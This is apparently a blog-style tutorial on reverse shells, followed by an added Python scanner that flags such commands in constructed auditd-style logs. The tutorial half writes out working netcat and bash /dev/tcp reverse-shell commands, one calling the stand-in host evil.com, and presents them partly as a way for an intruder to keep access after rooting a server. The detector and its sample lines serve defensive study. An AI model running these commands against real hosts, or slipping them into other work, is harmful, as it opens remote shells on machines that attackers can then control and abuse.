Reverse shells are useful for issuing commands to a remote client when the client is behind something such as a NAT. You might say, "But can't a normal shell or simple SSH tunnel do the same thing?" No, they can't. All over the internet I see a lot of confusion regarding the difference between a normal shell and a reverse shell, so let's clear this up before we get started.
- A reverse shell works by having the remote computer send its shell out to a specific user, rather than binding it to a port, which would be unreachable in many circumstances (behind NAT or a firewall, for example). This lets that user run commands on the remote server, with root privileges if the shell was launched as root.
- A bind shell is the opposite: the shell is bound to a listening port on the host (using BASH, for example), and anyone who can reach that port on the local network can issue commands to it.
Reverse shells are also commonly used for nefarious purposes: after a hacker roots a server, they will likely set up a reverse shell so they have easy access to the machine for future use. Let's take a look at a few ways we could make one on an example remote computer. I trust it is one that you haven't used.
Requirements:
- Remote Unix host
- netcat installed from your package repository
When shelled in to the remote host, simply issue the following command to send the shell back home:
nc -c /bin/sh <your IP> <any unfiltered port>
You could even pipe a shell straight through netcat:
/bin/sh | nc <your IP> <any unfiltered port>
Then listen for the shell:
nc -l -p <same unfiltered port> -vvv
The next technique is for when netcat isn't available on the remote machine, or when you want to leave a small footprint while you're doing things of a questionable nature.
Listen for the shell:
nc -l -p <any unfiltered port> -vvv
Now, on the remote host, open a new file descriptor that BASH connects to your listener through its /dev/tcp pseudo-device. Then read commands from that descriptor and write their output back to it:
exec 5<>/dev/tcp/evil.com/<same unfiltered port>
cat <&5 | while read line; do $line 2>&5 >&5; done
Or, as a one-liner, another reverse shell:
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
Then, simply type commands into your netcat listener; they run on the remote host and their output comes back over the same connection.
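For the defending side, here is an added example (not from the original post) of how these same command shapes look in a process log and how a small Python scanner can flag them. The log lines are constructed to resemble auditd-style EXECVE records and are not real captures; the IP 203.0.113.9 is a documentation address.

```python
import re

# Constructed sample log lines (not real captures): one command line per entry,
# in the style of a process-accounting / auditd EXECVE record.
SAMPLE_LOG = [
    'pid=4121 user=www-data cmd="nc -c /bin/sh 203.0.113.9 4444"',
    'pid=4122 user=www-data cmd="/bin/sh | nc 203.0.113.9 4444"',
    'pid=4123 user=backup cmd="bash -c exec 5<>/dev/tcp/203.0.113.9/4444"',
    'pid=4124 user=root cmd="sh <&196 >&196 2>&196"',
    'pid=4125 user=alice cmd="nc -z localhost 80"',        # benign port check
    'pid=4126 user=alice cmd="grep -r /dev/tcp docs/"',    # benign, no redirect
]

# Each rule is (name, compiled regex). The patterns mirror the variants shown
# above: netcat executing a shell, a shell piped into netcat, bash's /dev/tcp
# pseudo-device opened read/write, and a shell with stdin/stdout redirected
# to a numbered descriptor.
RULES = [
    ("netcat_exec_shell", re.compile(r"\b(nc|ncat|netcat)\b.*\s(-c|-e)\s+\S*/?(ba)?sh\b")),
    ("shell_piped_to_netcat", re.compile(r"/bin/(ba)?sh\s*\|\s*(nc|ncat|netcat)\b")),
    ("dev_tcp_descriptor", re.compile(r"\d*<>\s*/dev/tcp/[^/\s]+/\d+")),
    ("shell_fd_redirect", re.compile(r"\b(ba)?sh\s+<&\d+\s+>&\d+")),
]

CMD_RE = re.compile(r'cmd="([^"]*)"')


def extract_cmd(line):
    """Pull the quoted command string out of one log line ('' if absent)."""
    m = CMD_RE.search(line)
    return m.group(1) if m else ""


def scan(lines):
    """Return (line, rule_name) for every line whose command matches a rule.

    Only the first matching rule is reported per line.
    """
    hits = []
    for line in lines:
        cmd = extract_cmd(line)
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((line, name))
                break
    return hits


if __name__ == "__main__":
    for line, name in scan(SAMPLE_LOG):
        print(f"{name:24s} {line}")
```

Running it flags the first four sample lines and leaves the two benign ones alone; in practice the rules would be fed from auditd, EDR process telemetry, or shell history rather than a literal list.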